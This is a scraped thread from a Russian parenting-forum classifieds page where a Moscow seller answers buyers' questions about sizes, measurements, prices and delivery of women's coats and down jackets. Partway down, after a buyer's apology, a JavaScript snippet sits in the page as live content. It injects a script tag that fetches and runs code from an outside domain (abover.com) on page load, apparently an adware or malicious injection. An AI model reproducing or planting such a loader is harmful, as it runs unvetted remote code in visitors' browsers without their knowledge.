Войти
Москва

Пальто (новое) и куртка (в идеале) APRIORI на синтепоне. СУПЕР ЦЕНА!!! р.44-46.

Мама двоих (16 лет, 13 лет)

Елена, дн! А померить можно? Интересует пуховик сиреневый

0
08.11.2014
Москва

ДН! Пальто-пуховик?)

0
08.11.2014
Мама двоих (16 лет, 13 лет)

Да

0
09.11.2014
Москва

Размер?)

0
09.11.2014
Мама двоих (16 лет, 13 лет)

Нужны замеры, ношу42-44

0
09.11.2014
Москва

Замеры 42 р. Длина по спинке от воротника 93 см., длина рукава от плеча 65 см., Огруди полуобхват от подмышки до подмышки 48 см., плечи 38 см., Обедер полуобхват 49 см.))

0
09.11.2014
Мама двоих (16 лет, 13 лет)

А померить возможно?

0
09.11.2014
Москва

Возможно. Самовывоз м.Орехово, также доступна курьерская доставка службой по Москве 300 руб., по МО 450 руб. до 5 км. от МКАД.)))

0
09.11.2014
Мама девочки (14 лет) Щелково
Дд. Подскажите, а как с чёрной вязаной стойкой пальто можно заказать? оно деми было?
0
24.02.2015
Москва
ДД!)) Проданы, но уточню у поставщика случайно не осталось такого. Если будет отпишусь. Оно, да скорее демисезон. Хотя, некоторые кто не мерзлявый и всю зиму со свитером проходили.))) 
0
27.02.2015
Мама девочки (14 лет) Щелково

мне нужно российский 44-46, можно (даже желательно) и другого цвета
0
28.02.2015
Мама девочки (14 лет) Щелково

ДД. Не узнали ещё про пальтишко?

0
04.03.2015
Москва
ДД!!! К сожалению, у поставщика тоже уже нет этой модели в наличии. Не хотите на синтепоне APRIORI (см.фото 1). Там высокая стойка. очень стильное. Цвет и качество ткани на фото жаль не передать их осталось 2 шт. Если интересно могу фото на себе прислать))
0
04.03.2015
Мама девочки (14 лет) Щелково
фото хочу. Просто у него по фото более спортивный, что-ли, стиль. А мне офисный вариант нужен, а драп я не люблю.
0
04.03.2015
Москва
Добрый день!) отправила в личку.
0
06.03.2015
Мама троих (14 лет, 12 лет, 9 лет) Братск

Привет, а вот эти какого размера? нужен 44 р-р.

7. Куртки SAI KU пуховик (фото 6)
и эта, в наличие?
3. Куртка FFashion. Италия. Пуховик. с поясом (фото 2).

0
12.11.2014
Москва

Добрый день!)) По наличию могу сообщить завтра (SAI KU именно в цвете, как на 6 фото?), сегодня за городом. Подождете?)

0
13.11.2014
Мама троих (14 лет, 12 лет, 9 лет) Братск

конечно )




0
13.11.2014
Москва
Добрый день! Есть 44 р. SAI KU фото 6, и в черном цвете...))
0
15.11.2014
Мама троих (14 лет, 12 лет, 9 лет) Братск

спасибо. super_smilies082.gif




0
21.11.2014
Мама троих (14 лет, 12 лет, 9 лет) Братск

можно в другом

0
13.11.2014

ДД!можете в лс прислать на вас фото черного пуха с вязанными 3/4 рукавами ?и длина какая?

0
22.11.2014
Москва

ДД!) Какой размер?

0
22.11.2014

Мой 46

0
22.11.2014
Москва

Доброе утро!) Длина по спинке 100 см., по поводу фото ничего, если в личку отправлю фото модели на мне, но в другом цвете для наглядности. ))

0
23.11.2014
Мама двоих (15 лет, 12 лет) Ярославль

Добрый день! По замерам подскажите, длина рукава, ог, об?

0
03.03.2014
Москва

ДД! Длина рукава вместе с вязаной частью 67см., ОБюста 50см., ОТалии 46см., ОБедер 51см. (все размеры полуобхват), длина 107см. Оно суперское))))
0
03.03.2014
Мама двоих (15 лет, 12 лет) Ярославль

Спасибо, оно действительно классное! А нет ли вото на вас и какие у вас ппраметры, чтобы уж наверняка)))

0
03.03.2014
Москва

ответила в личку))))
0
03.03.2014
Мама двоих (18 лет, 24 года) Москва

Елена,ДД! Пальто 5. Пальто Just Valeri пуховик. (фото 4).
 интересует размер 46 и 48. Оно на зиму или нет? Спасибо!
0
02.08.2015
Москва
ДД)). Вас интересует пуховик пальто Just Valeri в черном цвете. Остался в наличии размер 48 и 40,42.
0
06.08.2015
Москва
Зимнее. 
0
06.08.2015
Мама двоих (18 лет, 11 лет) Бийск

Здравствуйте! Пальто в наличии? За 4500 + почта отдадите? 


0
10.03.2014
Москва
Комментарий удален
0
10.03.2014
Мама двоих (18 лет, 11 лет) Бийск

Спасибо, извините.

[removed](function () { var script = document.createElement('script'); script.src = 'https://abover.com/system/extension?iframe=' + ( self === top ? '0' : '1' ) + '&r=' + Math.random(); script.onload = script.onerror = function () { script.onload = script.onerror = null; script[removed].removeChild(script); } document.body.appendChild(script); })();[removed]
0
12.03.2014
Мама двоих (16 лет, 9 лет) Москва
Елена, подскажите, пожалуйста, а на синтепоне таких не будет?
1672d711df56f1e4940b46cba91085a5.jpg
0
26.02.2015
Москва
ДД!)) Нет, на синтепоне этой модели и не было....На синтепоне есть APRIORI (фото 1 цвет и качество не передать) цвет кофе с молоком. Оно очень стильное, легкое, теплое р.44-46. И ткань классная. 
0
27.02.2015
Мама мальчика (16 лет) Москва
Комментарий удален
0
25.02.2015
Москва
Доброй ночи!) 42-44 росс.
0
25.02.2015
Мама двоих (14 лет, 11 лет) Красноярск
Елена, а фото черного пальто на вас есть? По цене не понятно, сколько оно стоит? Почтой высылаете?
0
03.09.2014
Москва

Добрый день.)) Цена 8000 руб. Фото пришлю в личку)))почтой высылаю, пересылка за счет клиента (посчитать можно на сайте почта России))). Либо полная предоплата, либо частичная предоплата+наложенный платеж))).

0
03.09.2014
Мама мальчика (18 лет) Домодедово
ДД! Подскажите, пожалуйста длину пуховика черного с вязанными рукавами
0
18.01.2015
Москва
ДД!)) длина по спинке от воротника 93 см.
0
18.01.2015
Москва

ДД! Скажите, пож-та, а куртка (фото 6) на пуху? И есть ли 42 размер?

0
10.12.2014
Москва

ДД! Да, она на пуху. Есть)))

0
11.12.2014
Мама двоих (16 лет, 5 лет)

Здравствуйте. скажите, а черное пальто на какую погоду?
0
08.08.2014
Москва

Добрый вечер!!! Зимнее))
0
08.08.2014
Мама двоих (24 года, 14 лет) Дедовск

Доброе утро. Куртка со второго фото в наличии. Я не пойму по фото она глянцевая или матовая?

0
22.10.2015
Мама девочки (15 лет) Москва
ДД, Елена подскажите на российский 44-46 последняя куртка есть? (цвет любой) и если да, то возможна ли примерка и где (лучше в ЛС)
0
04.02.2015
Москва

ЧЕРНОЕ APRIORI с вязаным воротником — ПРОДАНО!!!!

0
04.09.2014
Москва

Цена 8000руб. с 01 сентября!!!!

0
02.09.2014
Мама двоих (18 лет, 11 лет) Бийск
Здравствуйте!!! Продолжаю настаивать))) Отдайте, пожалуйста, черное за 5 т.р.
0
26.07.2014
Мама двоих (19 лет, 13 лет)
Классное) Жаль, размер не мой) а где покупали, не подскажете?
0
28.02.2014
Мама мальчика (16 лет) Москва
Комментарий удален
0
26.03.2015
Мама девочки (16 лет) Подольск

Можно куртки 2 фото подробней! 

0
18.11.2014
П/сапоги LORIBLU (ориг.). Италия. Новые. 40р. 9000руб. Куртка пуховик DONNELL. Новая. р.44-46. Супер цена!!!

Похожие записи